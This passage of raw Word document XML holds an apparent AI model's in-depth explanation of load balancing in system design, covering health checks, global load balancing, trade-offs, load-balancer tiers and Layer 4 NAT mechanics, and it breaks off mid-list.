        <w:t xml:space="preserve">  Composite probe     → Critical dependencies are reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403749FB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Passive monitoring  → Actual user traffic outcomes (fastest, most accurate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E0444" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="2E9675A1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Global Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B5B8E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  DNS (GeoDNS)   → Region-level routing, minutes failover, TTL-limited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63644E05" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Anycast (BGP)  → AS-path routing, seconds failover, DDoS-resilient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A120430" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  CDN            → Edge caching + Anycast + L7 routing combined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40376E45" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E15D3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>The Fundamental Load Balancing Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE80170" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Perfect distribution    ↔  Low overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C11F6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (global least connections requires global state — expensive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599CFE7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (P2C: 80% of the benefit at 1% of the cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C999F9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="1924C31F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Session persistence     ↔  Load distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E31B0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (sticky sessions cause hotspots when traffic is skewed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4F3F8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (solution: push state externally, achieve true statelessness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30526C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="71D6F790" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Fast failover           ↔  False positive rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE432BE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (aggressive health checks detect failures fast but cause flapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737B7E5C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (hysteresis, multiple failure thresholds dampen oscillation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB795E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9"/>
    <w:p w14:paraId="445C055B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">  Visibility              ↔  Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194657B7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (L7 sees everything but pays TLS + parsing cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9FD149" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve">    (L4 sees nothing but processes at line rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CB424" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the best load balancer is the one that becomes invisible</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — it adds no latency, introduces no failures, requires no manual intervention, and distributes load so perfectly that no backend is ever a bottleneck. Every design decision in load balancing (algorithm choice, health check tuning, session handling, failure detection thresholds) is an optimization toward this ideal of </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transparent, zero-overhead traffic distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. The architectures that come closest — eBPF-based L4 with XDP, client-side load balancing in service meshes, Anycast with BGP — all share the same principle: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>push the load balancing decision as close to the traffic source as possible, with as little state and coordination as necessary</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, and let the distributed nature of the system itself handle the distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3135D4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # Load Balancing in System Design —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEAD5F8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load Balancing in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F374E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Load Balancing Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50996541" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Load balancing is the process of distributing incoming network traffic or workload across multiple backend servers (a server pool) to ensure no single server is overwhelmed, maximize throughput, minimize response time, and avoid overloading any single resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE581D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> A load balancer is not just a traffic distributor — it's a critical control plane component that makes decisions about routing, performs health monitoring, manages connection lifecycle, terminates encryption, and acts as the single logical entry point that abstracts away the complexity of a multi-server backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321720C9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without a load balancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51871A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Clients must know individual server IPs (tight coupling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8C03F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>One server gets overloaded while others are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3F586" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A failed server causes errors for all clients directed to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DED7D8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Scaling requires client-side changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B3BDB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With a load balancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0417DA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Clients know one address (the load balancer's VIP — Virtual IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413E821" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Traffic is distributed intelligently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABCFCFA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Failed servers are automatically removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41C522" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend changes are invisible to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093479AE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="6E45507A">
          <v:rect id="_x0000_i2671" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CB0E6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Where Load Balancers Sit in the Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768B333B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Multiple Tiers of Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553949CE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A production system typically has load balancers at multiple levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D148EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7141F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBBE4E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C09666" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0256754A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>[DNS-based Global LB] ← GeoDNS / Anycast (Layer 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE4E21" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068354F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D20910" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>[Edge / L4 Load Balancer] ← TCP/UDP level (e.g., NLB, LVS, IPVS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB2A445" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54D5C4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D998CDA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>[L7 Load Balancer / Reverse Proxy] ← HTTP level (e.g., Nginx, Envoy, ALB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD806E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4D1E8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312571DF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>[Application Servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E4185" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074460F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B096DF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>[Internal Service LB] ← Service mesh / client-side LB (e.g., Envoy sidecar, gRPC LB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98D8A7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBC713D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E50DA4B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>[Database / Cache LB] ← Connection routing (e.g., PgBouncer, ProxySQL, Redis Cluster client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED364BC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each layer solves a different problem and operates at a different network layer with different tradeoffs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC52F0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="742D4CD5">
          <v:rect id="_x0000_i2672" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F96CECC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Layer 4 (Transport Layer) Load Balancing — Deep Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57887400" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What L4 Load Balancing Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D702A3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Operates at TCP/UDP level. Makes routing decisions based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CEA80" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Source IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D0EAF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Destination IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F935C7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Protocol (TCP/UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E90E3D7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> inspect HTTP headers, URLs, cookies, or any application-layer content. It sees only packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781930F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 How L4 Load Balancing Works — Packet-Level Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F38C47" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT-based (Network Address Translation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5953DD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Client sends TCP SYN to the load balancer's VIP (e.g., 203.0.113.10:443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3177B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
